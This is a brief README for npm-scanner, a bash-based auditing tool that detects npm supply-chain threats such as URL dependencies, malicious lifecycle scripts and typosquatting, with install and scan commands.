Security auditing toolkit for detecting npm supply chain attacks. Detects threats that npm audit misses—URL dependencies (PhantomRaven-style attacks), malicious lifecycle scripts, typosquatting, and suspicious package metadata.
Zero npm dependencies by design: a security tool that depends on npm packages would be vulnerable to the same attacks it's trying to detect.
git clone https://github.com/virtualian/npm-scanner.git
cd npm-scanner
# Scan globally installed packages
./npm-scanner.sh scan --global
# Scan project dependencies
./npm-scanner.sh scan --project ~/code
# Validate a package before installing
./npm-scanner.sh validate lodashFull documentation: virtualian.github.io/npm-scanner
- Bash, jq, curl
- Node.js (no npm dependencies)
ISC